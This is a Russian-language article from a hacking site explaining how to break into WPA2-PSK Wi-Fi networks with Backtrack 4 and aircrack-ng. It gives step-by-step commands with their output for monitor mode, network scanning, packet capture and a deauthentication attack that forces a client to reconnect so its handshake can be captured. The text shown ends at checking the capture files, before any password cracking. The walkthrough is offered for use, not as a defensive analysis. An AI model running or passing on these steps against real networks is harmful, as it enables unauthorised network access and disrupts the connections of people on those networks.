V-zlom.ru » Статьи » Как взломать WPA2 PSK используя Backtrack 4, aircrack-ng и John The Ripper

Как взломать WPA2 PSK используя Backtrack 4, aircrack-ng и John The Ripper

Для начала переводим карту в режим "monitor mode" :

root@bt:~# airmon-ng


Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0)

wlan0 Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0)

wlan0 Ralink 2573 USB rt73usb - [phy0]

(monitor mode enabled on mon0)

Сделано, и теперь мы можем использовать карту как mon0

Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :


root@bt:~# airodump-ng mon0

CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:

airodump-ng mon0 —channel 10 —bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)


root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0

13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10

13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:


CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

Остановите airodump-ng и убедитесь что все необходимые файлы созданы

 

root@bt:/# ls /tmp/wpa2* -al

-rw-r--r— 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap

-rw-r--r— 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv

-rw-r--r— 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

  • Автор: kennen
  • Комментарии: 0
  • Просмотры: 2593
0

Добавить комментарий

Вы не авторизованы и вам запрещено писать комментарии. Для расширенных возможностей зарегистрируйтесь!